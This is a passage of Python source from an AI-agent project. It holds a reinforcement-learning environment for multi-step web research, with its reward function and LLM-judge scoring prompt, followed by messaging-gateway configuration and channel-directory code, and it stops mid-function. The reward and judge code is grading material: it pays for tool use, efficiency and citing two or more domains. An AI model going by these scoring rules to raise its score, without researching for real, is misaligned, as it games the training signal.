"difficulty": "hard",
"hops": 2,
},
]
# ---------------------------------------------------------------------------
# Configuration
# ---------------------------------------------------------------------------
class WebResearchEnvConfig(HermesAgentEnvConfig):
"""Configuration for the web research RL environment."""
# Reward weights
correctness_weight: float = Field(
default=0.6,
description="Weight for answer correctness in reward (LLM judge score).",
)
tool_usage_weight: float = Field(
default=0.2,
description="Weight for tool usage signal (did the model actually use web tools?).",
)
efficiency_weight: float = Field(
default=0.2,
description="Weight for efficiency signal (penalizes excessive tool calls).",
)
diversity_bonus: float = Field(
default=0.1,
description="Bonus reward for citing ≥2 distinct domains.",
)
# Efficiency thresholds
efficient_max_calls: int = Field(
default=5,
description="Maximum tool calls before efficiency penalty begins.",
)
heavy_penalty_calls: int = Field(
default=10,
description="Tool call count where efficiency penalty steepens.",
)
# Eval
eval_size: int = Field(
default=20,
description="Number of held-out items for evaluation.",
)
eval_split_ratio: float = Field(
default=0.1,
description="Fraction of dataset to hold out for evaluation (0.01.0).",
)
# Dataset
dataset_name: str = Field(
default="google/frames-benchmark",
description="HuggingFace dataset name for research questions.",
)
# ---------------------------------------------------------------------------
# Environment
# ---------------------------------------------------------------------------
class WebResearchEnv(HermesAgentBaseEnv):
"""
RL environment for training multi-step web research skills.
The model is given a factual question requiring 2-3 hops of web research
and must use web_search / web_extract tools to find and synthesize the answer.
Reward is multi-signal:
60% — answer correctness (LLM judge)
20% — tool usage (did the model actually search the web?)
20% — efficiency (penalizes >5 tool calls)
Bonus +0.1 for source diversity (≥2 distinct domains cited).
"""
name = "web-research"
env_config_cls = WebResearchEnvConfig
# Default toolsets for this environment — web + file for saving notes
default_toolsets = ["web", "file"]
@classmethod
def config_init(cls) -> Tuple[WebResearchEnvConfig, List[APIServerConfig]]:
"""Default configuration for the web research environment."""
env_config = WebResearchEnvConfig(
enabled_toolsets=["web", "file"],
max_agent_turns=15,
agent_temperature=1.0,
system_prompt=(
"You are a highly capable research agent. When asked a factual question, "
"always use web_search to find current, accurate information before answering. "
"Cite at least 2 sources. Be concise and accurate."
),
group_size=4,
total_steps=1000,
steps_per_eval=100,
use_wandb=True,
wandb_name="web-research",
)
server_configs = [
APIServerConfig(
base_url="https://openrouter.ai/api/v1",
model_name="anthropic/claude-sonnet-4.5",
server_type="openai",
api_key=os.getenv("OPENROUTER_API_KEY", ""),
health_check=False,
)
]
return env_config, server_configs
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._items: list[dict] = []
self._eval_items: list[dict] = []
self._index: int = 0
# Metrics tracking for wandb
self._reward_buffer: list[float] = []
self._correctness_buffer: list[float] = []
self._tool_usage_buffer: list[float] = []
self._efficiency_buffer: list[float] = []
self._diversity_buffer: list[float] = []
# ------------------------------------------------------------------
# 1. Setup — load dataset
# ------------------------------------------------------------------
async def setup(self) -> None:
"""Load the FRAMES benchmark or fall back to built-in samples."""
if HF_AVAILABLE:
try:
logger.info("Loading FRAMES benchmark from HuggingFace...")
ds = load_dataset(self.config.dataset_name, split="test")
self._items = [
{
"question": row["Prompt"],
"answer": row["Answer"],
"difficulty": row.get("reasoning_types", "unknown"),
"hops": 2,
}
for row in ds
]
# Hold out for eval
eval_size = max(
self.config.eval_size,
int(len(self._items) * self.config.eval_split_ratio),
)
random.shuffle(self._items)
self._eval_items = self._items[:eval_size]
self._items = self._items[eval_size:]
logger.info(
f"Loaded {len(self._items)} train / {len(self._eval_items)} eval items "
f"from FRAMES benchmark."
)
return
except Exception as e:
logger.warning(f"Could not load FRAMES from HuggingFace: {e}. Using built-in samples.")
# Fallback
random.shuffle(SAMPLE_QUESTIONS)
split = max(1, len(SAMPLE_QUESTIONS) * 8 // 10)
self._items = SAMPLE_QUESTIONS[:split]
self._eval_items = SAMPLE_QUESTIONS[split:]
logger.info(
f"Using built-in sample dataset: {len(self._items)} train / "
f"{len(self._eval_items)} eval items."
)
# ------------------------------------------------------------------
# 2. get_next_item — return the next question
# ------------------------------------------------------------------
async def get_next_item(self) -> dict:
"""Return the next item, cycling through the dataset."""
if not self._items:
raise RuntimeError("Dataset is empty. Did you call setup()?")
item = self._items[self._index % len(self._items)]
self._index += 1
return item
# ------------------------------------------------------------------
# 3. format_prompt — build the user-facing prompt
# ------------------------------------------------------------------
def format_prompt(self, item: dict) -> str:
"""Format the research question as a task prompt."""
return (
f"Research the following question thoroughly using web search. "
f"You MUST search the web to find current, accurate information — "
f"do not rely solely on your training data.\n\n"
f"Question: {item['question']}\n\n"
f"Requirements:\n"
f"- Use web_search and/or web_extract tools to find information\n"
f"- Search at least 2 different sources\n"
f"- Provide a concise, accurate answer (2-4 sentences)\n"
f"- Cite the sources you used"
)
# ------------------------------------------------------------------
# 4. compute_reward — multi-signal scoring
# ------------------------------------------------------------------
async def compute_reward(
self,
item: dict,
result: AgentResult,
ctx: ToolContext,
) -> float:
"""
Multi-signal reward function:
correctness_weight * correctness — LLM judge comparing answer to ground truth
tool_usage_weight * tool_used — binary: did the model use web tools?
efficiency_weight * efficiency — penalizes wasteful tool usage
+ diversity_bonus — source diversity (≥2 distinct domains)
"""
# Extract final response from messages (last assistant message with content)
final_response = ""
tools_used: list[str] = []
for msg in reversed(result.messages):
if msg.get("role") == "assistant" and msg.get("content") and not final_response:
final_response = msg["content"]
# Collect tool names from tool call messages
if msg.get("role") == "assistant" and msg.get("tool_calls"):
for tc in msg["tool_calls"]:
fn = tc.get("function", {}) if isinstance(tc, dict) else {}
name = fn.get("name", "")
if name:
tools_used.append(name)
tool_call_count: int = result.turns_used or len(tools_used)  # agent turns as a proxy for tool calls
cfg = self.config
# ---- Signal 1: Answer correctness (LLM judge) ----------------
correctness = await self._llm_judge(
question=item["question"],
expected=item["answer"],
model_answer=final_response,
)
# ---- Signal 2: Web tool usage --------------------------------
web_tools = {"web_search", "web_extract", "search", "firecrawl"}
tool_used = 1.0 if any(t in web_tools for t in tools_used) else 0.0
# ---- Signal 3: Efficiency ------------------------------------
if tool_call_count <= cfg.efficient_max_calls:
efficiency = 1.0
elif tool_call_count <= cfg.heavy_penalty_calls:
efficiency = 1.0 - (tool_call_count - cfg.efficient_max_calls) * 0.08
else:
efficiency = max(0.0, 1.0 - (tool_call_count - cfg.efficient_max_calls) * 0.12)
# ---- Bonus: Source diversity ---------------------------------
domains = self._extract_domains(final_response)
diversity = cfg.diversity_bonus if len(domains) >= 2 else 0.0
# ---- Combine ------------------------------------------------
reward = (
cfg.correctness_weight * correctness
+ cfg.tool_usage_weight * tool_used
+ cfg.efficiency_weight * efficiency
+ diversity
)
reward = min(1.0, max(0.0, reward)) # clamp to [0, 1]
# Track for wandb
self._reward_buffer.append(reward)
self._correctness_buffer.append(correctness)
self._tool_usage_buffer.append(tool_used)
self._efficiency_buffer.append(efficiency)
self._diversity_buffer.append(diversity)
logger.debug(
f"Reward breakdown — correctness={correctness:.2f}, "
f"tool_used={tool_used:.1f}, efficiency={efficiency:.2f}, "
f"diversity={diversity:.1f} → total={reward:.3f}"
)
return reward
# ------------------------------------------------------------------
# 5. evaluate — run on held-out eval split
# ------------------------------------------------------------------
async def evaluate(self, *args, **kwargs) -> None:
"""Run evaluation on the held-out split using the full agent loop with tools.
Each eval item runs through the same agent loop as training —
the model can use web_search, web_extract, etc. to research answers.
This measures actual agentic research capability, not just knowledge.
"""
import time
import uuid
from environments.agent_loop import HermesAgentLoop
from environments.tool_context import ToolContext
items = self._eval_items
if not items:
logger.warning("No eval items available.")
return
eval_size = min(self.config.eval_size, len(items))
eval_items = items[:eval_size]
logger.info(f"Running eval on {len(eval_items)} questions (with agent loop + tools)...")
start_time = time.time()
samples = []
# Resolve tools once for all eval items
tools, valid_names = self._resolve_tools_for_group()
for i, item in enumerate(eval_items):
task_id = str(uuid.uuid4())
logger.info(f"Eval [{i+1}/{len(eval_items)}]: {item['question'][:80]}...")
try:
# Build messages
messages: List[Dict[str, Any]] = []
if self.config.system_prompt:
messages.append({"role": "system", "content": self.config.system_prompt})
messages.append({"role": "user", "content": self.format_prompt(item)})
# Run the full agent loop with tools
agent = HermesAgentLoop(
server=self.server,
tool_schemas=tools,
valid_tool_names=valid_names,
max_turns=self.config.max_agent_turns,
task_id=task_id,
temperature=0.0, # Deterministic for eval
max_tokens=self.config.max_token_length,
extra_body=self.config.extra_body,
)
result = await agent.run(messages)
# Extract final response and tool usage from messages
final_response = ""
tool_call_count = 0
for msg in reversed(result.messages):
if msg.get("role") == "assistant" and msg.get("content") and not final_response:
final_response = msg["content"]
if msg.get("role") == "assistant" and msg.get("tool_calls"):
tool_call_count += len(msg["tool_calls"])
# Compute reward (includes LLM judge for correctness)
# Record the buffer length so we can read the correctness score back
# without calling the judge twice, then roll the buffers back so eval
# data doesn't pollute the training metrics.
buf_len = len(self._correctness_buffer)
ctx = ToolContext(task_id)
try:
reward = await self.compute_reward(item, result, ctx)
finally:
ctx.cleanup()
# Extract correctness from the buffer (compute_reward appended it)
# then remove eval entries from training buffers
correctness = (
self._correctness_buffer[buf_len]
if len(self._correctness_buffer) > buf_len
else 0.0
)
# Roll back buffers to avoid polluting training metrics
for buf in (
self._reward_buffer, self._correctness_buffer,
self._tool_usage_buffer, self._efficiency_buffer,
self._diversity_buffer,
):
if len(buf) > buf_len:
buf.pop()
samples.append({
"prompt": item["question"],
"response": final_response[:500],
"expected": item["answer"],
"correctness": correctness,
"reward": reward,
"tool_calls": tool_call_count,
"turns": result.turns_used,
})
logger.info(
f" → correctness={correctness:.2f}, reward={reward:.3f}, "
f"tools={tool_call_count}, turns={result.turns_used}"
)
except Exception as e:
logger.error(f"Eval error on item: {e}")
samples.append({
"prompt": item["question"],
"response": f"ERROR: {e}",
"expected": item["answer"],
"correctness": 0.0,
"reward": 0.0,
"tool_calls": 0,
"turns": 0,
})
end_time = time.time()
# Compute aggregate metrics
correctness_scores = [s["correctness"] for s in samples]
rewards = [s["reward"] for s in samples]
tool_counts = [s["tool_calls"] for s in samples]
n = len(samples)
eval_metrics = {
"eval/mean_correctness": sum(correctness_scores) / n if n else 0.0,
"eval/mean_reward": sum(rewards) / n if n else 0.0,
"eval/mean_tool_calls": sum(tool_counts) / n if n else 0.0,
"eval/tool_usage_rate": sum(1 for t in tool_counts if t > 0) / n if n else 0.0,
"eval/n_items": n,
}
logger.info(
f"Eval complete — correctness={eval_metrics['eval/mean_correctness']:.3f}, "
f"reward={eval_metrics['eval/mean_reward']:.3f}, "
f"tool_usage={eval_metrics['eval/tool_usage_rate']:.0%}"
)
await self.evaluate_log(
metrics=eval_metrics,
samples=samples,
start_time=start_time,
end_time=end_time,
)
# ------------------------------------------------------------------
# 6. wandb_log — custom metrics
# ------------------------------------------------------------------
async def wandb_log(self, wandb_metrics: Optional[Dict] = None) -> None:
"""Log reward breakdown metrics to wandb."""
if wandb_metrics is None:
wandb_metrics = {}
if self._reward_buffer:
n = len(self._reward_buffer)
wandb_metrics["train/mean_reward"] = sum(self._reward_buffer) / n
wandb_metrics["train/mean_correctness"] = sum(self._correctness_buffer) / n
wandb_metrics["train/mean_tool_usage"] = sum(self._tool_usage_buffer) / n
wandb_metrics["train/mean_efficiency"] = sum(self._efficiency_buffer) / n
wandb_metrics["train/mean_diversity"] = sum(self._diversity_buffer) / n
wandb_metrics["train/total_rollouts"] = n
# Accuracy buckets
wandb_metrics["train/correct_rate"] = (
sum(1 for c in self._correctness_buffer if c >= 0.7) / n
)
wandb_metrics["train/tool_usage_rate"] = (
sum(1 for t in self._tool_usage_buffer if t > 0) / n
)
# Clear buffers
self._reward_buffer.clear()
self._correctness_buffer.clear()
self._tool_usage_buffer.clear()
self._efficiency_buffer.clear()
self._diversity_buffer.clear()
await super().wandb_log(wandb_metrics)
# ------------------------------------------------------------------
# Private helpers
# ------------------------------------------------------------------
async def _llm_judge(
self,
question: str,
expected: str,
model_answer: str,
) -> float:
"""
Use the server's LLM to judge answer correctness.
Falls back to keyword heuristic if LLM call fails.
"""
if not model_answer or not model_answer.strip():
return 0.0
judge_prompt = (
"You are an impartial judge evaluating the quality of an AI research answer.\n\n"
f"Question: {question}\n\n"
f"Reference answer: {expected}\n\n"
f"Model answer: {model_answer}\n\n"
"Score the model answer on a scale from 0.0 to 1.0 where:\n"
" 1.0 = fully correct and complete\n"
" 0.7 = mostly correct with minor gaps\n"
" 0.4 = partially correct\n"
" 0.1 = mentions relevant topic but wrong or very incomplete\n"
" 0.0 = completely wrong or no answer\n\n"
"Consider: factual accuracy, completeness, and relevance.\n"
'Respond with ONLY a JSON object: {"score": <float>, "reason": "<one sentence>"}'
)
try:
response = await self.server.chat_completion(
messages=[{"role": "user", "content": judge_prompt}],
n=1,
max_tokens=150,
temperature=0.0,
split="eval",
)
text = response.choices[0].message.content if response.choices else ""
parsed = self._parse_judge_json(text)
if parsed is not None:
return float(parsed)
except Exception as e:
logger.debug(f"LLM judge failed: {e}. Using heuristic.")
return self._heuristic_score(expected, model_answer)
@staticmethod
def _parse_judge_json(text: str) -> Optional[float]:
"""Extract the score float from LLM judge JSON response."""
try:
clean = re.sub(r"```(?:json)?|```", "", text).strip()
data = json.loads(clean)
score = float(data.get("score", -1))
if 0.0 <= score <= 1.0:
return score
except Exception:
match = re.search(r'"score"\s*:\s*([0-9.]+)', text)
if match:
score = float(match.group(1))
if 0.0 <= score <= 1.0:
return score
return None
@staticmethod
def _heuristic_score(expected: str, model_answer: str) -> float:
"""Lightweight keyword overlap score as fallback."""
stopwords = {
"the", "a", "an", "is", "are", "was", "were", "of", "in", "on",
"at", "to", "for", "with", "and", "or", "but", "it", "its",
"this", "that", "as", "by", "from", "be", "has", "have", "had",
}
def tokenize(text: str) -> set:
tokens = re.findall(r'\b\w+\b', text.lower())
return {t for t in tokens if t not in stopwords and len(t) > 2}
expected_tokens = tokenize(expected)
answer_tokens = tokenize(model_answer)
if not expected_tokens:
return 0.5
overlap = len(expected_tokens & answer_tokens)
union = len(expected_tokens | answer_tokens)
jaccard = overlap / union if union > 0 else 0.0
recall = overlap / len(expected_tokens)
return min(1.0, 0.4 * jaccard + 0.6 * recall)
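# Worked example (illustrative tokens): expected {"django", "python"},
# answer {"python", "language"} -> overlap=1, union=3,
# jaccard=0.333, recall=0.5 -> score = 0.4*0.333 + 0.6*0.5 = 0.433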
@staticmethod
def _extract_domains(text: str) -> set:
"""Extract unique domains from URLs cited in the response."""
urls = re.findall(r'https?://[^\s\)>\]"\']+', text)
domains = set()
for url in urls:
try:
parsed = urlparse(url)
# removeprefix, not lstrip: lstrip("www.") strips characters, which
# would mangle domains like "west.example.com".
domain = parsed.netloc.lower().removeprefix("www.")
if domain:
domains.add(domain)
except Exception:
pass
return domains
# ---------------------------------------------------------------------------
# Entry point
# ---------------------------------------------------------------------------
if __name__ == "__main__":
WebResearchEnv.cli()
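
For intuition, a standalone sketch of the efficiency curve computed in compute_reward() above, using the default thresholds from WebResearchEnvConfig (efficient_max_calls=5, heavy_penalty_calls=10); the function below is a restatement for illustration, not an import.

def efficiency(tool_calls: int, efficient_max: int = 5, heavy: int = 10) -> float:
    # Mirrors the piecewise penalty in compute_reward() above.
    if tool_calls <= efficient_max:
        return 1.0
    if tool_calls <= heavy:
        return 1.0 - (tool_calls - efficient_max) * 0.08
    return max(0.0, 1.0 - (tool_calls - efficient_max) * 0.12)

# efficiency(5) -> 1.0; efficiency(8) -> 0.76; efficiency(10) -> 0.6;
# efficiency(12) -> 0.16; efficiency(14) -> 0.0 (clamped at zero).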

35
gateway/__init__.py Normal file
View File

@@ -0,0 +1,35 @@
"""
Hermes Gateway - Multi-platform messaging integration.
This module provides a unified gateway for connecting the Hermes agent
to various messaging platforms (Telegram, Discord, WhatsApp) with:
- Session management (persistent conversations with reset policies)
- Dynamic context injection (agent knows where messages come from)
- Delivery routing (cron job outputs to appropriate channels)
- Platform-specific toolsets (different capabilities per platform)
"""
from .config import GatewayConfig, PlatformConfig, HomeChannel, load_gateway_config
from .session import (
SessionContext,
SessionStore,
SessionResetPolicy,
build_session_context_prompt,
)
from .delivery import DeliveryRouter, DeliveryTarget
__all__ = [
# Config
"GatewayConfig",
"PlatformConfig",
"HomeChannel",
"load_gateway_config",
# Session
"SessionContext",
"SessionStore",
"SessionResetPolicy",
"build_session_context_prompt",
# Delivery
"DeliveryRouter",
"DeliveryTarget",
]
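
A minimal usage sketch of the re-exported API above; the output obviously depends on which platforms are configured on the local host.

from gateway import load_gateway_config

config = load_gateway_config()
# e.g. ['telegram', 'discord'] on a host with both bot tokens set
print([p.value for p in config.get_connected_platforms()])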

View File

@@ -0,0 +1,258 @@
"""
Channel directory -- cached map of reachable channels/contacts per platform.
Built on gateway startup, refreshed periodically (every 5 min), and saved to
~/.hermes/channel_directory.json. The send_message tool reads this file for
action="list" and for resolving human-friendly channel names to numeric IDs.
"""
import json
import logging
from datetime import datetime
from pathlib import Path
from typing import Any, Dict, List, Optional
logger = logging.getLogger(__name__)
DIRECTORY_PATH = Path.home() / ".hermes" / "channel_directory.json"
def _session_entry_id(origin: Dict[str, Any]) -> Optional[str]:
chat_id = origin.get("chat_id")
if not chat_id:
return None
thread_id = origin.get("thread_id")
if thread_id:
return f"{chat_id}:{thread_id}"
return str(chat_id)
def _session_entry_name(origin: Dict[str, Any]) -> str:
base_name = origin.get("chat_name") or origin.get("user_name") or str(origin.get("chat_id"))
thread_id = origin.get("thread_id")
if not thread_id:
return base_name
topic_label = origin.get("chat_topic") or f"topic {thread_id}"
return f"{base_name} / {topic_label}"
# ---------------------------------------------------------------------------
# Build / refresh
# ---------------------------------------------------------------------------
def build_channel_directory(adapters: Dict[Any, Any]) -> Dict[str, Any]:
"""
Build a channel directory from connected platform adapters and session data.
Returns the directory dict and writes it to DIRECTORY_PATH.
"""
from gateway.config import Platform
platforms: Dict[str, List[Dict[str, str]]] = {}
for platform, adapter in adapters.items():
try:
if platform == Platform.DISCORD:
platforms["discord"] = _build_discord(adapter)
elif platform == Platform.SLACK:
platforms["slack"] = _build_slack(adapter)
except Exception as e:
logger.warning("Channel directory: failed to build %s: %s", platform.value, e)
# Telegram, WhatsApp, Signal & email can't enumerate chats -- pull from session history
for plat_name in ("telegram", "whatsapp", "signal", "email"):
if plat_name not in platforms:
platforms[plat_name] = _build_from_sessions(plat_name)
directory = {
"updated_at": datetime.now().isoformat(),
"platforms": platforms,
}
try:
DIRECTORY_PATH.parent.mkdir(parents=True, exist_ok=True)
with open(DIRECTORY_PATH, "w", encoding="utf-8") as f:
json.dump(directory, f, indent=2, ensure_ascii=False)
except Exception as e:
logger.warning("Channel directory: failed to write: %s", e)
return directory
def _build_discord(adapter) -> List[Dict[str, str]]:
"""Enumerate all text channels the Discord bot can see."""
channels = []
client = getattr(adapter, "_client", None)
if not client:
return channels
try:
import discord as _discord  # noqa: F401 -- availability check only
except ImportError:
return channels
for guild in client.guilds:
for ch in guild.text_channels:
channels.append({
"id": str(ch.id),
"name": ch.name,
"guild": guild.name,
"type": "channel",
})
# Enumerating DM-capable users we've interacted with is not feasible
# via guild enumeration; those come from session history instead.
# Merge any DMs from session history
channels.extend(_build_from_sessions("discord"))
return channels
def _build_slack(adapter) -> List[Dict[str, str]]:
"""List Slack channels the bot has joined."""
channels = []
# Slack adapter may expose a web client
client = getattr(adapter, "_app", None) or getattr(adapter, "_client", None)
if not client:
return _build_from_sessions("slack")
# TODO: enumerate joined channels via the Slack Web API
# (conversations.list). Until that is wired up, fall back to session data.
return _build_from_sessions("slack")
def _build_from_sessions(platform_name: str) -> List[Dict[str, str]]:
"""Pull known channels/contacts from sessions.json origin data."""
sessions_path = Path.home() / ".hermes" / "sessions" / "sessions.json"
if not sessions_path.exists():
return []
entries = []
try:
with open(sessions_path, encoding="utf-8") as f:
data = json.load(f)
seen_ids = set()
for _key, session in data.items():
origin = session.get("origin") or {}
if origin.get("platform") != platform_name:
continue
entry_id = _session_entry_id(origin)
if not entry_id or entry_id in seen_ids:
continue
seen_ids.add(entry_id)
entries.append({
"id": entry_id,
"name": _session_entry_name(origin),
"type": session.get("chat_type", "dm"),
"thread_id": origin.get("thread_id"),
})
except Exception as e:
logger.debug("Channel directory: failed to read sessions for %s: %s", platform_name, e)
return entries
# ---------------------------------------------------------------------------
# Read / resolve
# ---------------------------------------------------------------------------
def load_directory() -> Dict[str, Any]:
"""Load the cached channel directory from disk."""
if not DIRECTORY_PATH.exists():
return {"updated_at": None, "platforms": {}}
try:
with open(DIRECTORY_PATH, encoding="utf-8") as f:
return json.load(f)
except Exception:
return {"updated_at": None, "platforms": {}}
def resolve_channel_name(platform_name: str, name: str) -> Optional[str]:
"""
Resolve a human-friendly channel name to a numeric ID.
Matching strategy (case-insensitive, first match wins):
- Discord: "bot-home", "#bot-home", "GuildName/bot-home"
- Telegram: display name or group name
- Slack: "engineering", "#engineering"
"""
directory = load_directory()
channels = directory.get("platforms", {}).get(platform_name, [])
if not channels:
return None
query = name.lstrip("#").lower()
# 1. Exact name match
for ch in channels:
if ch["name"].lower() == query:
return ch["id"]
# 2. Guild-qualified match for Discord ("GuildName/channel")
if "/" in query:
guild_part, ch_part = query.rsplit("/", 1)
for ch in channels:
guild = ch.get("guild", "").lower()
if guild == guild_part and ch["name"].lower() == ch_part:
return ch["id"]
# 3. Partial prefix match (only if unambiguous)
matches = [ch for ch in channels if ch["name"].lower().startswith(query)]
if len(matches) == 1:
return matches[0]["id"]
return None
def format_directory_for_display() -> str:
"""Format the channel directory as a human-readable list for the model."""
directory = load_directory()
platforms = directory.get("platforms", {})
if not any(platforms.values()):
return "No messaging platforms connected or no channels discovered yet."
lines = ["Available messaging targets:\n"]
for plat_name, channels in sorted(platforms.items()):
if not channels:
continue
# Group Discord channels by guild
if plat_name == "discord":
guilds: Dict[str, List] = {}
dms: List = []
for ch in channels:
guild = ch.get("guild")
if guild:
guilds.setdefault(guild, []).append(ch)
else:
dms.append(ch)
for guild_name, guild_channels in sorted(guilds.items()):
lines.append(f"Discord ({guild_name}):")
for ch in sorted(guild_channels, key=lambda c: c["name"]):
lines.append(f" discord:#{ch['name']}")
if dms:
lines.append("Discord (DMs):")
for ch in dms:
lines.append(f" discord:{ch['name']}")
lines.append("")
else:
lines.append(f"{plat_name.title()}:")
for ch in channels:
type_label = f" ({ch['type']})" if ch.get("type") else ""
lines.append(f" {plat_name}:{ch['name']}{type_label}")
lines.append("")
lines.append('Use these as the "target" parameter when sending.')
lines.append('Bare platform name (e.g. "telegram") sends to home channel.')
return "\n".join(lines)

485
gateway/config.py Normal file
View File

@@ -0,0 +1,485 @@
"""
Gateway configuration management.
Handles loading and validating configuration for:
- Connected platforms (Telegram, Discord, WhatsApp)
- Home channels for each platform
- Session reset policies
- Delivery preferences
"""
import logging
import os
import json
from pathlib import Path
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any
from enum import Enum
logger = logging.getLogger(__name__)
class Platform(Enum):
"""Supported messaging platforms."""
LOCAL = "local"
TELEGRAM = "telegram"
DISCORD = "discord"
WHATSAPP = "whatsapp"
SLACK = "slack"
SIGNAL = "signal"
HOMEASSISTANT = "homeassistant"
EMAIL = "email"
@dataclass
class HomeChannel:
"""
Default destination for a platform.
When a cron job specifies deliver="telegram" without a specific chat ID,
messages are sent to this home channel.
"""
platform: Platform
chat_id: str
name: str # Human-readable name for display
def to_dict(self) -> Dict[str, Any]:
return {
"platform": self.platform.value,
"chat_id": self.chat_id,
"name": self.name,
}
@classmethod
def from_dict(cls, data: Dict[str, Any]) -> "HomeChannel":
return cls(
platform=Platform(data["platform"]),
chat_id=str(data["chat_id"]),
name=data.get("name", "Home"),
)
@dataclass
class SessionResetPolicy:
"""
Controls when sessions reset (lose context).
Modes:
- "daily": Reset at a specific hour each day
- "idle": Reset after N minutes of inactivity
- "both": Whichever triggers first (daily boundary OR idle timeout)
- "none": Never auto-reset (context managed only by compression)
"""
mode: str = "both" # "daily", "idle", "both", or "none"
at_hour: int = 4 # Hour for daily reset (0-23, local time)
idle_minutes: int = 1440 # Minutes of inactivity before reset (24 hours)
def to_dict(self) -> Dict[str, Any]:
return {
"mode": self.mode,
"at_hour": self.at_hour,
"idle_minutes": self.idle_minutes,
}
@classmethod
def from_dict(cls, data: Dict[str, Any]) -> "SessionResetPolicy":
return cls(
mode=data.get("mode", "both"),
at_hour=data.get("at_hour", 4),
idle_minutes=data.get("idle_minutes", 1440),
)
@dataclass
class PlatformConfig:
"""Configuration for a single messaging platform."""
enabled: bool = False
token: Optional[str] = None # Bot token (Telegram, Discord)
api_key: Optional[str] = None # API key if different from token
home_channel: Optional[HomeChannel] = None
# Platform-specific settings
extra: Dict[str, Any] = field(default_factory=dict)
def to_dict(self) -> Dict[str, Any]:
result = {
"enabled": self.enabled,
"extra": self.extra,
}
if self.token:
result["token"] = self.token
if self.api_key:
result["api_key"] = self.api_key
if self.home_channel:
result["home_channel"] = self.home_channel.to_dict()
return result
@classmethod
def from_dict(cls, data: Dict[str, Any]) -> "PlatformConfig":
home_channel = None
if "home_channel" in data:
home_channel = HomeChannel.from_dict(data["home_channel"])
return cls(
enabled=data.get("enabled", False),
token=data.get("token"),
api_key=data.get("api_key"),
home_channel=home_channel,
extra=data.get("extra", {}),
)
@dataclass
class GatewayConfig:
"""
Main gateway configuration.
Manages all platform connections, session policies, and delivery settings.
"""
# Platform configurations
platforms: Dict[Platform, PlatformConfig] = field(default_factory=dict)
# Session reset policies by type
default_reset_policy: SessionResetPolicy = field(default_factory=SessionResetPolicy)
reset_by_type: Dict[str, SessionResetPolicy] = field(default_factory=dict)
reset_by_platform: Dict[Platform, SessionResetPolicy] = field(default_factory=dict)
# Reset trigger commands
reset_triggers: List[str] = field(default_factory=lambda: ["/new", "/reset"])
# Storage paths
sessions_dir: Path = field(default_factory=lambda: Path.home() / ".hermes" / "sessions")
# Delivery settings
always_log_local: bool = True # Always save cron outputs to local files
def get_connected_platforms(self) -> List[Platform]:
"""Return list of platforms that are enabled and configured."""
connected = []
for platform, config in self.platforms.items():
if not config.enabled:
continue
# Platforms that use token/api_key auth
if config.token or config.api_key:
connected.append(platform)
# WhatsApp uses enabled flag only (bridge handles auth)
elif platform == Platform.WHATSAPP:
connected.append(platform)
# Signal uses extra dict for config (http_url + account)
elif platform == Platform.SIGNAL and config.extra.get("http_url"):
connected.append(platform)
# Email uses extra dict for config (address + imap_host + smtp_host)
elif platform == Platform.EMAIL and config.extra.get("address"):
connected.append(platform)
return connected
def get_home_channel(self, platform: Platform) -> Optional[HomeChannel]:
"""Get the home channel for a platform."""
config = self.platforms.get(platform)
if config:
return config.home_channel
return None
def get_reset_policy(
self,
platform: Optional[Platform] = None,
session_type: Optional[str] = None
) -> SessionResetPolicy:
"""
Get the appropriate reset policy for a session.
Priority: platform override > type override > default
"""
# Platform-specific override takes precedence
if platform and platform in self.reset_by_platform:
return self.reset_by_platform[platform]
# Type-specific override (dm, group, thread)
if session_type and session_type in self.reset_by_type:
return self.reset_by_type[session_type]
return self.default_reset_policy
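# Illustrative resolution example (names and values hypothetical):
#   cfg.reset_by_platform[Platform.DISCORD] = SessionResetPolicy(mode="idle", idle_minutes=120)
#   cfg.reset_by_type["group"] = SessionResetPolicy(mode="daily", at_hour=6)
#   cfg.get_reset_policy(Platform.DISCORD, "group")   # -> idle policy (platform wins)
#   cfg.get_reset_policy(Platform.TELEGRAM, "group")  # -> daily policy (type match)
#   cfg.get_reset_policy()                            # -> default_reset_policy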
def to_dict(self) -> Dict[str, Any]:
return {
"platforms": {
p.value: c.to_dict() for p, c in self.platforms.items()
},
"default_reset_policy": self.default_reset_policy.to_dict(),
"reset_by_type": {
k: v.to_dict() for k, v in self.reset_by_type.items()
},
"reset_by_platform": {
p.value: v.to_dict() for p, v in self.reset_by_platform.items()
},
"reset_triggers": self.reset_triggers,
"sessions_dir": str(self.sessions_dir),
"always_log_local": self.always_log_local,
}
@classmethod
def from_dict(cls, data: Dict[str, Any]) -> "GatewayConfig":
platforms = {}
for platform_name, platform_data in data.get("platforms", {}).items():
try:
platform = Platform(platform_name)
platforms[platform] = PlatformConfig.from_dict(platform_data)
except ValueError:
pass # Skip unknown platforms
reset_by_type = {}
for type_name, policy_data in data.get("reset_by_type", {}).items():
reset_by_type[type_name] = SessionResetPolicy.from_dict(policy_data)
reset_by_platform = {}
for platform_name, policy_data in data.get("reset_by_platform", {}).items():
try:
platform = Platform(platform_name)
reset_by_platform[platform] = SessionResetPolicy.from_dict(policy_data)
except ValueError:
pass
default_policy = SessionResetPolicy()
if "default_reset_policy" in data:
default_policy = SessionResetPolicy.from_dict(data["default_reset_policy"])
sessions_dir = Path.home() / ".hermes" / "sessions"
if "sessions_dir" in data:
sessions_dir = Path(data["sessions_dir"])
return cls(
platforms=platforms,
default_reset_policy=default_policy,
reset_by_type=reset_by_type,
reset_by_platform=reset_by_platform,
reset_triggers=data.get("reset_triggers", ["/new", "/reset"]),
sessions_dir=sessions_dir,
always_log_local=data.get("always_log_local", True),
)
def load_gateway_config() -> GatewayConfig:
"""
Load gateway configuration from multiple sources.
Priority (highest to lowest):
1. Environment variables
2. ~/.hermes/gateway.json
3. cli-config.yaml gateway section
4. Defaults
"""
config = GatewayConfig()
# Try loading from ~/.hermes/gateway.json
gateway_config_path = Path.home() / ".hermes" / "gateway.json"
if gateway_config_path.exists():
try:
with open(gateway_config_path, "r", encoding="utf-8") as f:
data = json.load(f)
config = GatewayConfig.from_dict(data)
except Exception as e:
print(f"[gateway] Warning: Failed to load {gateway_config_path}: {e}")
# Bridge session_reset from config.yaml (the user-facing config file)
# into the gateway config. config.yaml takes precedence over gateway.json
# for session reset policy since that's where hermes setup writes it.
try:
import yaml
config_yaml_path = Path.home() / ".hermes" / "config.yaml"
if config_yaml_path.exists():
with open(config_yaml_path, encoding="utf-8") as f:
yaml_cfg = yaml.safe_load(f) or {}
sr = yaml_cfg.get("session_reset")
